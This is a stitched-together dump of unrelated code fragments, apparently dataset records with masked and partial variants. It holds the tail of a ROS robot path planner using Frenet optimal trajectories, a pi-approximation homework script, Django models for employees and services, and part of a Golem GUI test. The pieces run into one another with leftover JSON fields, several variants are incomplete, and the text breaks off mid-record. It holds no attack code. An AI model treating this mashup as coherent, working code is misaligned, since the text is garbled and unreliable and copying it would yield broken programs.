###########################################################\n Jp = sum(np.power(tfp.d_ddd, 2)) # square of jerk\n Js = sum(np.power(tfp.s_ddd, 2)) # square of jerk\n # square of diff from target speed\n ds = (TARGET_SPEED - tfp.s_d[-1])**2\n # 横向的损失函数\n tfp.cd = KJ * Jp + KT * Ti + KD * tfp.d[-1]**2\n # 纵向的损失函数\n tfp.cv = KJ * Js + KT * Ti + KD * ds\n # 总的损失函数为d 和 s方向的损失函数乘对应的系数相加\n\n #########################################################\n #低速时的损失函数\n #########################################################\n # # 低速时的损失函数\n # ltfp = copy.deepcopy(tfp)\n # ltfp.d_sss = [lat_qp.calc_third_derivative(s) for s in tfp.s]\n # Jp_s = sum(np.power(ltfp.d_sss, 2)) # square of jerk\n 
# Js = sum(np.power(tfp.s_ddd, 2)) # square of jerk\n # # S = s1 - s0\n # dS = tfp.s[-1] - s0\n # #横向的损失函数\n # tfp.cd = KJ * Jp_s + KT * dS + KD * tfp.d[-1] ** 2\n # #纵向的损失函数\n # tfp.cv = KJ * Js + KT * Ti + KD * ds\n \n tfp.cf = KLAT * tfp.cd + KLON * tfp.cv\n frenet_paths.append(tfp)\n return frenet_paths\n\n\ndef calc_global_paths(fplist, csp):\n for fp in fplist:\n # calc global positions\n for i in range(len(fp.s)):\n ix, iy = csp.calc_position(fp.s[i])\n if ix is None:\n break\n iyaw = csp.calc_yaw(fp.s[i])\n di = fp.d[i]\n fx = ix + di * math.cos(iyaw + math.pi / 2.0)\n fy = iy + di * math.sin(iyaw + math.pi / 2.0)\n fp.x.append(fx)\n fp.y.append(fy)\n\n # calc yaw and ds\n for i in range(len(fp.x) - 1):\n dx = fp.x[i + 1] - fp.x[i]\n dy = fp.y[i + 1] - fp.y[i]\n fp.yaw.append(math.atan2(dy, dx))\n fp.ds.append(math.sqrt(dx**2 + dy**2))\n\n fp.yaw.append(fp.yaw[-1])\n fp.ds.append(fp.ds[-1])\n\n # calc curvature\n for i in range(len(fp.yaw) - 1):\n fp.c.append((fp.yaw[i + 1] - fp.yaw[i]) / fp.ds[i])\n\n return fplist\n\n\ndef check_collision(fp, ob):\n \n for i in range(len(ob[:, 0])):\n d = [((ix - ob[i, 0])**2 + (iy - ob[i, 1])**2)\n for (ix, iy) in zip(fp.x, fp.y)]\n collision = any([di <= ROBOT_RADIUS**2 for di in d])\n if collision:\n return False\n return True\n\n\ndef check_paths(fplist, ob):\n\n \"\"\"\n check path above max speed, max a, does collision or not\n \"\"\"\n okind = []\n for i in range(len(fplist)):\n if any([v > MAX_SPEED for v in fplist[i].s_d]): # Max speed check\n continue\n elif any([abs(a) > MAX_ACCEL for a in fplist[i].s_dd]): # Max accel check\n continue\n elif any([abs(c) > MAX_CURVATURE for c in fplist[i].c]): # Max curvature check\n continue\n elif not check_collision(fplist[i], ob):\n continue\n okind.append(i)\n return [fplist[i] for i in okind]\n\n\ndef frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob):\n ob = np.array(ob)\n fplist = calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0)\n fplist = calc_global_paths(fplist, csp)\n fplist = check_paths(fplist, ob)\n\n # find minimum cost path\n mincost = float(\"inf\")\n bestpath = None\n for fp in fplist:\n if mincost >= fp.cf:\n mincost = fp.cf\n bestpath = fp\n return bestpath\n\n\ndef generate_road_widle(x,y):\n csp = Spline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1)\n road_left_x, road_left_y, road_right_x, road_right_y = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n road_left_ix = ix + MAX_ROAD_WIDTH/2 * math.cos(csp.calc_yaw(i_s)+math.pi / 2.0)\n road_left_iy = iy + MAX_ROAD_WIDTH/2 * math.sin(csp.calc_yaw(i_s)+math.pi / 2.0)\n road_right_ix = ix - MAX_ROAD_WIDTH/2 * math.cos(csp.calc_yaw(i_s)+math.pi / 2.0)\n road_right_iy = iy - MAX_ROAD_WIDTH/2 * math.sin(csp.calc_yaw(i_s)+math.pi / 2.0)\n road_left_x.append(road_left_ix)\n road_left_y.append(road_left_iy)\n road_right_x.append(road_right_ix)\n road_right_y.append(road_right_iy)\n return road_left_x, road_left_y, road_right_x, road_right_y\n\ndef generate_target_course(x, y):\n csp = Spline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1) #0.1\n rx, ry, ryaw, rk = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n rx.append(ix)\n ry.append(iy)\n ryaw.append(csp.calc_yaw(i_s))\n rk.append(csp.calc_curvature(i_s))\n return rx, ry, ryaw, rk, csp\n\n\n#######################################################################################\ndef load_global_path():\n global zero_cord_x,zero_cord_y\n bet = 0.1 \n blank = [] #buffer\n white = [] #buffer\n yellow = [] #buffer\n GPS_x = [] #所采集预描点的x\n GPS_y 
= [] #所采集预描点的x\n #读取预描点\n nums, ber = np.loadtxt(\"/home/robot/Robot/Smart_robot_ws/src/GNSS_driver/save_point_data/rightdoubleliner.txt\", dtype=str, delimiter=',', unpack=True)\n for i in range(len(nums)):\n if not nums[i] in blank: #去除重复点\n #blank.append(nums[i])\n yellow.append(float(nums[i]))\n white.append(float(ber[i]))\n bx = yellow[0] #起始点坐标\n by = white[0]\n for i in range(len(yellow)):\n dx = yellow[i] - bx\n dy = white[i] - by\n dis = math.sqrt(dx ** 2 + dy ** 2) \n if dis > bet: #选取大于设定的距离的点\n GPS_x.append(yellow[i]) #使cx,cy中点均满足要求\n GPS_y.append(white[i])\n bx = yellow[i]\n by = white[i] \n GPS_x = np.array(GPS_x) #将列表转换成数组\n GPS_y = np.array(GPS_y)\n #print(\"cx:\",cx)\n #print(\"cy:\",cy)\n \n zero_cord_x = GPS_x[0]\n zero_cord_y = GPS_y[0]\n GPS_x = GPS_x - zero_cord_x\n GPS_y = GPS_y - zero_cord_y\n plt.plot(GPS_x,GPS_y, \"-r\", label=\"GPS point \")\n plt.plot()\n plt.show() \n\n return GPS_x, GPS_y\n\nclass Info(object):\n def __init__(self):\n self.CurrGPS_lat = float(-1)\n self.CurrGPS_lon = float(-1)\n self.CurrentVelocity = float(-1)\n self.Target_Velocity = float(-1)\n self.ImuYaw = float(-1)\n self.Target_Theta = float(-1)\n #self.CommandMessage = Car_Input()\n self.gob = np.array([])\n self.ob = np.array([])\n self.gobx = np.array([])\n self.goby = np.array([])\n\n # Subscribers\n\n rospy.Subscriber(\"coordinate\", Point, self.FeedbackCallbackObs)\n sub = rospy.Subscriber('gnss_message', GNSS_CAN, self.FeedbackCallbackGPSIMU,queue_size = 10) #订阅GPS数据\n rospy.Subscriber(\"Motor_Feedback_mssage\", Motor_Feedback,self.RVcallback,queue_size = 10)\n \n\n \n \n def FeedbackCallbackGPSIMU(self, msg): \n self.CurrGPS_lat = msg.latitude \n self.CurrGPS_lon = msg.longitude \n self.ImuYaw = (90-msg.course_angle)*np.pi/180\n #print(self.CurrGPS_lat,self.CurrGPS_lon,self.ImuYaw)\n\n def FeedbackCallbackObs(self, msg):\n global Gob_x\n global Gob_y\n self.gobx = msg.x\n self.goby = msg.y\n #print(\"msg.x\",\"msg.y\", msg.x, msg.y)\n Gob_x.append(self.gobx)\n Gob_y.append(self.goby) \n #print(\"Gob_x\",\"Gob_y\", Gob_x, Gob_y)\n #np.append(self.gobx,5)\n #np.append(self.goby,5)\n \n self.gob = np.column_stack((Gob_x, Gob_y))\n #print(self.gobx,self.goby)\n #print(self.gob)\n\n def RVcallback(self,msg):\n \n self.CurrentVelocity = msg.Base_Vehspd\n #print(\"*\"*50)\n #print(\"rv:\",rv)\n #rospy.loginfo('I heard: %s', data.data)\n\n\n def init(self):\n return self.CurrGPS_lat, self.CurrGPS_lon, self.ImuYaw, self.gobx, self.goby, self.gob, self.CurrentVelocity\n\n\n def talker(self,Target_Velocity, path_record):\n self.rate = rospy.Rate(100) # 10hz\n self.pub_Velocity = rospy.Publisher('Car_Velocity', Float32, queue_size = 10) #定义Publisher对象\n # 定义发布器 path_pub 发布 trajectory\n self.path_pub = rospy.Publisher('trajectory', localPath, queue_size = 50) #定义Publisher对象\n self.pub_Velocity.publish(Target_Velocity)\n # 发布路径\n self.path_pub.publish(path_record)\n #self.rate.sleep()\n\n\n\n# def talker(self,Target_Velocity,Target_Theta):\n# self.pub_Velocity = rospy.Publisher('Car_Velocity', Float32, queue_size = 10) #定义Publisher对象\n# self.pub_Steering = rospy.Publisher('Car_Steering', Float32, queue_size = 10)\n# self.rate = rospy.Rate(100) # 10hz\n# self.pub_Velocity.publish(Target_Velocity)\n# self.pub_Steering.publish(Target_Theta)\n# self.rate.sleep()\n\n\n\n\n\n\n#######################################################################################\ndef get_transalation(curr_gps_lat,curr_gps_lon):\n curr_posy=(float(curr_gps_lon)-zero_cord_y)\n 
curr_posx=(float(curr_gps_lat)-zero_cord_x)\n #print(\"curr_posy,curr_posx=\",curr_posy,curr_posx)\n return curr_posx, curr_posy\n\n\n\ndef get_transformation(pt,curr_yaw,T):\n c, s = np.cos(curr_yaw), np.sin(curr_yaw)\n R = (np.array(((c,-s), (s, c))))\n pt=pt.dot(R)+T\n return pt\n\n\n\ndef get_arc_length(tx,ty,st):\n arc_length=0\n for x in range(1,st):\n arc_length=arc_length+(np.hypot((tx[x-1]-tx[x]),(ty[x-1]-ty[x])))\n return arc_length\n\n\n\ndef get_lateral_dist(tx,ty,curr_posx,curr_posy):\n dist=[]\n for x in range(0,len(tx)-1):\n dist.append(np.hypot((float(curr_posx)-tx[x]),(float(curr_posy)-ty[x])))\n lat_dist=min(dist)\n st=dist.index(min(dist))\n theta1=math.atan2((ty[st]-ty[st-1]),(tx[st]-tx[st-1]))\n theta2=math.atan2((curr_posy-ty[st-1]),(curr_posx-tx[st-1]))\n if lat_dist<THRESH_DIST:\n lat_dist=0\n curr_posx=tx[st]\n curr_posy=ty[st]\n if theta2<theta1:\n lat_dist=-lat_dist\n # print(lat_dist)\n return st, lat_dist, curr_posx, curr_posy\n\n\n\ndef proportional_control(target, current):\n #print(\"*\"*50)\n #print(\"current=\",current)\n #print(\"target - current\",target - current)\n a = 1.0 * (target - current)\n\n return a\n\n\n\n\n\n\ndef main():\n\n ptx = []\n pty = []\n\n ptx, pty = load_global_path()\n tx, ty, tyaw, tc, csp = generate_target_course(ptx, pty)\n #print(csp)\n road_left_x, road_left_y, road_right_x, road_right_y = generate_road_widle(ptx, pty)\n \n #当前车速及加速度\n c_speed = 5.0/3.6\n c_acc = 1.0\n c_d_dd = 0\n c_d_d = 0\n area = 25.0 # animation area length [m]\n start = time.time()\n rospy.init_node('AvoidObstacles_PlannerOut', anonymous = False)\n my_node = Info()\n \n \n while not rospy.is_shutdown():\n CurrGPS_lat, CurrGPS_lon, ImuYaw, gobx, goby, gob, CurrentVelocity = my_node.init()\n #print(\"gob\",gob)\n ob = []\n \n if (CurrGPS_lat != -1 and CurrGPS_lon != -1 and ImuYaw != -1):\n \n \n\n \n \n \n #print(CurrGPS_lat,CurrGPS_lon,ImuYaw, curr_posx, curr_posy)\n #print(gobx,goby,gob)\n #path = frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob)\n #s0 = path.s[1]\n #c_d = path.d[1]\n #c_d_d = path.d_d[1]\n #c_d_dd = path.d_dd[1]\n #c_speed = path.s_d[1]\n \n curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)\n T = [curr_posx, curr_posy]\n \n \n \n \n curr_yaw = ImuYaw #+ math.pi / 2\n \n \n if (len(gob) == 0):\n ob = [[-20, -20]]\n \n else:\n ob = gob\n \n \n ob_len = len(ob)-1\n for x in xrange(0, ob_len):\n #print(\"ob_transformation\",ob)\n ob = np.array(ob)\n #ob[x, :] = .2 * ob[x, :]\n ob[x, :] = get_transformation(ob[x, :], -curr_yaw, T)\n #print(\"ob_transformation\",ob)\n #############################################################\n \n \n \n \n \n # c_d_dd = c_acc*math.cos(math.atan2((ty[spt]-curr_posy),(tx[spt]-curr_posx))+curr_yaw)\n \n \n #spt, c_d, curr_posx, curr_posy = get_lateral_dist(tx, ty, curr_posx, curr_posy)\n \n #curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)\n \n \n \n try:\n curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)\n spt, c_d, curr_posx, curr_posy = get_lateral_dist(tx, ty, curr_posx, curr_posy)\n s0 = get_arc_length(tx, ty, spt)\n path = frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob)\n c_speed = path.s_d[1] \n #c_d_d = c_speed*math.cos(math.atan2((ty[spt]-curr_posy),(tx[spt]-curr_posx))-curr_yaw)\n c_d_d = path.d_d[1] \n c_d_dd = path.d_dd[1] \n \n if np.hypot(path.x[1] - tx[-1], path.y[1] - ty[-1]) <= 1.0:\n print(\"Goal\")\n c_speed = 0.0\n break\n if show_animation:\n plt.cla()\n plt.plot(tx, ty, \"-.k\")\n plt.plot(road_left_x, 
road_left_y, \"-k\")\n plt.plot(road_right_x, road_right_y, \"-k\")\n plt.plot(ob[:, 0], ob[:, 1], \"ob\")\n plt.plot(path.x[1:], path.y[1:], \"-or\")\n plt.plot(path.x[1], path.y[1], \"vc\")\n plt.xlim(path.x[1] - area, path.x[1] + area)\n plt.ylim(path.y[1] - area, path.y[1] + area)\n plt.arrow(curr_posx, curr_posy, math.cos(curr_yaw), math.sin(curr_yaw),fc=\"r\", ec=\"k\", head_width=0.5, head_length=1.0)\n plt.title(\"v[km/h]:\" + str(c_speed)[0:4])\n plt.xlabel(u'x/m', fontsize=14) # 设置x轴,并设定字号大小\n plt.ylabel(u'y/m', fontsize=14) # 设置y轴,并设定字号大小\n plt.pause(0.0001)\n \n \n \n ####################规划成功############### \n ###########################################\n PathFail_flag = 0 \n ###########################################\n \n \n except:\n ###############规划失败################\n PathFail_flag = 1\n print(\"Don't find optimal path\")\n \n ################对障碍物堆栈清空############\n ############################################\n ############################################\n global Gob_x\n global Gob_y\n Gob_x*=0\n Gob_y*=0 \n ############################################\n ############################################\n \n \n \n############################################################################### \n \n \n try:\n '''\n acc = proportional_control(6, CurrentVelocity)\n temp1=path.yaw[1] `\n temp2=curr_yaw \n \n if temp1<0:\n temp1=6.28+temp1\n if temp2<0:\n temp2=6.28+temp2\n\n val = temp1-temp2\n \n if val > 3.14:\n val = val - 6.28\n if val < -3.14:\n val = val + 6.28\n \n val = math.degrees(val)\n \n if val > 50:\n val = 50\n if val < -50:\n val = -50\n \n my_node.talker(acc,val)\n '''\n path_record = localPath()\n\n # 配置路径\n for i in range(len(path.x[1:])):\n\n #print(\"path_x\",path.x[i])\n \n path_record.path_x.append(path.x[i])\n path_record.path_y.append(path.y[i]) \n # 路径数量限制\n if len(path_record.path_x) > 10000:\n path_record.path_x.pop(0)\n path_record.path_y.pop(0)\n # 发布路径`\n my_node.talker(c_speed, path_record)\n \n except: \n print(\"local path send fail\")\n pass\n #my_node.talker(c_speed, path.x[1:], path.y[1:])\n #except:\n # pass\n\n print(\"Finish\")\n end = time.time()\n #print(\"total time: \", end - start)\n\n if show_animation:\n plt.grid(True)\n plt.show()\n\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
20,
21,
24,
25,
27
]
}
|
[
20,
21,
24,
25,
27
] |
#--------------------------------------------------------
# File------------project2.py
# Developer-------Paige Weber
# Course----------CS1213-03
# Project---------Project #1
# Due-------------September 26, 2017
#
# This program uses Gregory-Leibniz series to compute
# an approximate value of pi.
#--------------------------------------------------------
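# Series used below: pi/4 = 1 - 1/3 + 1/5 - 1/7 + ...,
# i.e. pi is approximated by 4 * sum over count of (-1)**(count + 1) / (2*count - 1).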
number_of_terms = int(input("How many terms? "))
number_of_terms = number_of_terms + 1
if number_of_terms >= 1:
add_approximation = 0
for count in range (1, number_of_terms):
approximation = (((-1)**(count + 1))/(2 * count - 1))
add_approximation = approximation + add_approximation
solution = add_approximation * 4
print("Approxiation of pi: %1.5f"%solution)
else:
print("The number of terms must be greater than zero.")
|
normal
|
{
"blob_id": "466148395a4141793b5f92c84513fd093876db76",
"index": 9964,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif number_of_terms >= 1:\n add_approximation = 0\n for count in range(1, number_of_terms):\n approximation = (-1) ** (count + 1) / (2 * count - 1)\n add_approximation = approximation + add_approximation\n solution = add_approximation * 4\n print('Approxiation of pi: %1.5f' % solution)\nelse:\n print('The number of terms must be greater than zero.')\n",
"step-3": "number_of_terms = int(input('How many terms? '))\nnumber_of_terms = number_of_terms + 1\nif number_of_terms >= 1:\n add_approximation = 0\n for count in range(1, number_of_terms):\n approximation = (-1) ** (count + 1) / (2 * count - 1)\n add_approximation = approximation + add_approximation\n solution = add_approximation * 4\n print('Approxiation of pi: %1.5f' % solution)\nelse:\n print('The number of terms must be greater than zero.')\n",
"step-4": "#--------------------------------------------------------\n# File------------project2.py\n# Developer-------Paige Weber\n# Course----------CS1213-03\n# Project---------Project #1\n# Due-------------September 26, 2017\n#\n# This program uses Gregory-Leibniz series to compute\n# an approximate value of pi.\n#--------------------------------------------------------\nnumber_of_terms = int(input(\"How many terms? \"))\nnumber_of_terms = number_of_terms + 1\nif number_of_terms >= 1:\n\n add_approximation = 0\n\n for count in range (1, number_of_terms):\n approximation = (((-1)**(count + 1))/(2 * count - 1))\n add_approximation = approximation + add_approximation\n solution = add_approximation * 4\n\n print(\"Approxiation of pi: %1.5f\"%solution)\n\nelse:\n print(\"The number of terms must be greater than zero.\")\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from django.contrib.auth.models import User
from django.core import validators
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.contrib.auth.models import Group
from django.conf import settings
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def assign_group(sender, instance, created, **kwargs):
"""Сигнал, добавляющий созданного пользователя в группу editors"""
if created:
editors_group = Group.objects.get(name='editors')
instance.groups.add(editors_group)
class Employee(models.Model):
"""Сотрудники"""
name = models.CharField("Имя", max_length=100)
age = models.PositiveSmallIntegerField("Возраст", validators=[validators.MaxValueValidator(120),
validators.MinValueValidator(18)])
position = models.CharField("Должность", max_length=60)
photo = models.ImageField("Фото", upload_to="employees/")
achievements = models.TextField("Достижения", max_length=2000,
help_text="Информация об образовании, опыте, квалификации и профессиональных достижениях")
def __str__(self):
return self.name
class Meta:
verbose_name = "Сотрудник"
verbose_name_plural = "Сотрудники"
class Category(models.Model):
"""Категории"""
name = models.CharField("Категория", max_length=150)
url = models.SlugField(max_length=160, unique=True)
def __str__(self):
return self.name
class Meta:
verbose_name = "Категория"
verbose_name_plural = "Категории"
class Service(models.Model):
"""Услуга"""
PERIOD = (
(0, ''),
(1, '6'),
(2, '12'),
(3, '24'),
)
title = models.CharField("Название", max_length=100)
description = models.TextField("Описание")
image = models.ImageField("Фото", upload_to="services/", null=True, blank=True)
employee = models.ManyToManyField(Employee, verbose_name="Cотрудник", related_name="service_employee")
category = models.ForeignKey(Category, verbose_name="Категория", on_delete=models.SET_NULL, null=True)
warranty = models.PositiveSmallIntegerField("Гарантийный срок", choices=PERIOD, help_text="Указать в месяцах")
price = models.DecimalField("Стоимость услуги", max_digits=9, decimal_places=2, default=0,
help_text="Указывать сумму в рублях", validators=[validators.MinValueValidator(0)])
url = models.SlugField(max_length=130, unique=True)
def __str__(self):
return self.title
class Meta:
verbose_name = "Услуга"
verbose_name_plural = "Услуги"
|
normal
|
{
"blob_id": "a139042d0c6fa4941b7149a33b0a48018e9f511b",
"index": 9003,
"step-1": "<mask token>\n\n\nclass Category(models.Model):\n \"\"\"Категории\"\"\"\n name = models.CharField('Категория', max_length=150)\n url = models.SlugField(max_length=160, unique=True)\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n\nclass Service(models.Model):\n \"\"\"Услуга\"\"\"\n PERIOD = (0, ''), (1, '6'), (2, '12'), (3, '24')\n title = models.CharField('Название', max_length=100)\n description = models.TextField('Описание')\n image = models.ImageField('Фото', upload_to='services/', null=True,\n blank=True)\n employee = models.ManyToManyField(Employee, verbose_name='Cотрудник',\n related_name='service_employee')\n category = models.ForeignKey(Category, verbose_name='Категория',\n on_delete=models.SET_NULL, null=True)\n warranty = models.PositiveSmallIntegerField('Гарантийный срок', choices\n =PERIOD, help_text='Указать в месяцах')\n price = models.DecimalField('Стоимость услуги', max_digits=9,\n decimal_places=2, default=0, help_text='Указывать сумму в рублях',\n validators=[validators.MinValueValidator(0)])\n url = models.SlugField(max_length=130, unique=True)\n\n def __str__(self):\n return self.title\n\n\n class Meta:\n verbose_name = 'Услуга'\n verbose_name_plural = 'Услуги'\n",
"step-2": "<mask token>\n\n\nclass Employee(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n verbose_name = 'Сотрудник'\n verbose_name_plural = 'Сотрудники'\n\n\nclass Category(models.Model):\n \"\"\"Категории\"\"\"\n name = models.CharField('Категория', max_length=150)\n url = models.SlugField(max_length=160, unique=True)\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n\nclass Service(models.Model):\n \"\"\"Услуга\"\"\"\n PERIOD = (0, ''), (1, '6'), (2, '12'), (3, '24')\n title = models.CharField('Название', max_length=100)\n description = models.TextField('Описание')\n image = models.ImageField('Фото', upload_to='services/', null=True,\n blank=True)\n employee = models.ManyToManyField(Employee, verbose_name='Cотрудник',\n related_name='service_employee')\n category = models.ForeignKey(Category, verbose_name='Категория',\n on_delete=models.SET_NULL, null=True)\n warranty = models.PositiveSmallIntegerField('Гарантийный срок', choices\n =PERIOD, help_text='Указать в месяцах')\n price = models.DecimalField('Стоимость услуги', max_digits=9,\n decimal_places=2, default=0, help_text='Указывать сумму в рублях',\n validators=[validators.MinValueValidator(0)])\n url = models.SlugField(max_length=130, unique=True)\n\n def __str__(self):\n return self.title\n\n\n class Meta:\n verbose_name = 'Услуга'\n verbose_name_plural = 'Услуги'\n",
"step-3": "<mask token>\n\n\nclass Employee(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n verbose_name = 'Сотрудник'\n verbose_name_plural = 'Сотрудники'\n\n\nclass Category(models.Model):\n \"\"\"Категории\"\"\"\n name = models.CharField('Категория', max_length=150)\n url = models.SlugField(max_length=160, unique=True)\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n\nclass Service(models.Model):\n \"\"\"Услуга\"\"\"\n PERIOD = (0, ''), (1, '6'), (2, '12'), (3, '24')\n title = models.CharField('Название', max_length=100)\n description = models.TextField('Описание')\n image = models.ImageField('Фото', upload_to='services/', null=True,\n blank=True)\n employee = models.ManyToManyField(Employee, verbose_name='Cотрудник',\n related_name='service_employee')\n category = models.ForeignKey(Category, verbose_name='Категория',\n on_delete=models.SET_NULL, null=True)\n warranty = models.PositiveSmallIntegerField('Гарантийный срок', choices\n =PERIOD, help_text='Указать в месяцах')\n price = models.DecimalField('Стоимость услуги', max_digits=9,\n decimal_places=2, default=0, help_text='Указывать сумму в рублях',\n validators=[validators.MinValueValidator(0)])\n url = models.SlugField(max_length=130, unique=True)\n\n def __str__(self):\n return self.title\n\n\n class Meta:\n verbose_name = 'Услуга'\n verbose_name_plural = 'Услуги'\n",
"step-4": "from django.contrib.auth.models import User\nfrom django.core import validators\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.contrib.auth.models import Group\nfrom django.conf import settings\n\n\n@receiver(post_save, sender=settings.AUTH_USER_MODEL)\ndef assign_group(sender, instance, created, **kwargs):\n \"\"\"Сигнал, добавляющий созданного пользователя в группу editors\"\"\"\n if created:\n editors_group = Group.objects.get(name='editors')\n instance.groups.add(editors_group)\n\n\nclass Employee(models.Model):\n \"\"\"Сотрудники\"\"\"\n name = models.CharField('Имя', max_length=100)\n age = models.PositiveSmallIntegerField('Возраст', validators=[\n validators.MaxValueValidator(120), validators.MinValueValidator(18)])\n position = models.CharField('Должность', max_length=60)\n photo = models.ImageField('Фото', upload_to='employees/')\n achievements = models.TextField('Достижения', max_length=2000,\n help_text=\n 'Информация об образовании, опыте, квалификации и профессиональных достижениях'\n )\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n verbose_name = 'Сотрудник'\n verbose_name_plural = 'Сотрудники'\n\n\nclass Category(models.Model):\n \"\"\"Категории\"\"\"\n name = models.CharField('Категория', max_length=150)\n url = models.SlugField(max_length=160, unique=True)\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n\nclass Service(models.Model):\n \"\"\"Услуга\"\"\"\n PERIOD = (0, ''), (1, '6'), (2, '12'), (3, '24')\n title = models.CharField('Название', max_length=100)\n description = models.TextField('Описание')\n image = models.ImageField('Фото', upload_to='services/', null=True,\n blank=True)\n employee = models.ManyToManyField(Employee, verbose_name='Cотрудник',\n related_name='service_employee')\n category = models.ForeignKey(Category, verbose_name='Категория',\n on_delete=models.SET_NULL, null=True)\n warranty = models.PositiveSmallIntegerField('Гарантийный срок', choices\n =PERIOD, help_text='Указать в месяцах')\n price = models.DecimalField('Стоимость услуги', max_digits=9,\n decimal_places=2, default=0, help_text='Указывать сумму в рублях',\n validators=[validators.MinValueValidator(0)])\n url = models.SlugField(max_length=130, unique=True)\n\n def __str__(self):\n return self.title\n\n\n class Meta:\n verbose_name = 'Услуга'\n verbose_name_plural = 'Услуги'\n",
"step-5": "from django.contrib.auth.models import User\nfrom django.core import validators\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.contrib.auth.models import Group\n\nfrom django.conf import settings\n\n\n@receiver(post_save, sender=settings.AUTH_USER_MODEL)\ndef assign_group(sender, instance, created, **kwargs):\n \"\"\"Сигнал, добавляющий созданного пользователя в группу editors\"\"\"\n\n if created:\n editors_group = Group.objects.get(name='editors')\n instance.groups.add(editors_group)\n\n\nclass Employee(models.Model):\n \"\"\"Сотрудники\"\"\"\n\n name = models.CharField(\"Имя\", max_length=100)\n age = models.PositiveSmallIntegerField(\"Возраст\", validators=[validators.MaxValueValidator(120),\n validators.MinValueValidator(18)])\n position = models.CharField(\"Должность\", max_length=60)\n photo = models.ImageField(\"Фото\", upload_to=\"employees/\")\n achievements = models.TextField(\"Достижения\", max_length=2000,\n help_text=\"Информация об образовании, опыте, квалификации и профессиональных достижениях\")\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = \"Сотрудник\"\n verbose_name_plural = \"Сотрудники\"\n\n\nclass Category(models.Model):\n \"\"\"Категории\"\"\"\n\n name = models.CharField(\"Категория\", max_length=150)\n url = models.SlugField(max_length=160, unique=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = \"Категория\"\n verbose_name_plural = \"Категории\"\n\n\nclass Service(models.Model):\n \"\"\"Услуга\"\"\"\n\n PERIOD = (\n (0, ''),\n (1, '6'),\n (2, '12'),\n (3, '24'),\n )\n\n title = models.CharField(\"Название\", max_length=100)\n description = models.TextField(\"Описание\")\n image = models.ImageField(\"Фото\", upload_to=\"services/\", null=True, blank=True)\n employee = models.ManyToManyField(Employee, verbose_name=\"Cотрудник\", related_name=\"service_employee\")\n category = models.ForeignKey(Category, verbose_name=\"Категория\", on_delete=models.SET_NULL, null=True)\n warranty = models.PositiveSmallIntegerField(\"Гарантийный срок\", choices=PERIOD, help_text=\"Указать в месяцах\")\n price = models.DecimalField(\"Стоимость услуги\", max_digits=9, decimal_places=2, default=0,\n help_text=\"Указывать сумму в рублях\", validators=[validators.MinValueValidator(0)])\n url = models.SlugField(max_length=130, unique=True)\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = \"Услуга\"\n verbose_name_plural = \"Услуги\"\n",
"step-ids": [
8,
9,
10,
14,
15
]
}
|
[
8,
9,
10,
14,
15
] |
from golem import actions
from projects.golem_gui.pages import common
from projects.golem_gui.pages import api
from projects.golem_gui.pages import test_builder_code
description = 'Verify the user can edit test code and save it'
tags = ['smoke']
def setup(data):
common.access_golem(data.env.url, data.env.admin)
api.project.using_project('test_builder_code')
data.test = api.test.create_access_test_code(data.project)
def test(data):
test_line = "description = 'desc'"
test_builder_code.set_value(test_line)
actions.click(test_builder_code.save_button)
common.assert_toast_message_is_displayed('Test ' + data.test + ' saved')
actions.refresh_page()
test_builder_code.assert_value(test_line)
|
normal
|
{
"blob_id": "d4cdc4f1995eab7f01c970b43cb0a3c5ed4a2711",
"index": 3673,
"step-1": "<mask token>\n\n\ndef setup(data):\n common.access_golem(data.env.url, data.env.admin)\n api.project.using_project('test_builder_code')\n data.test = api.test.create_access_test_code(data.project)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef setup(data):\n common.access_golem(data.env.url, data.env.admin)\n api.project.using_project('test_builder_code')\n data.test = api.test.create_access_test_code(data.project)\n\n\ndef test(data):\n test_line = \"description = 'desc'\"\n test_builder_code.set_value(test_line)\n actions.click(test_builder_code.save_button)\n common.assert_toast_message_is_displayed('Test ' + data.test + ' saved')\n actions.refresh_page()\n test_builder_code.assert_value(test_line)\n",
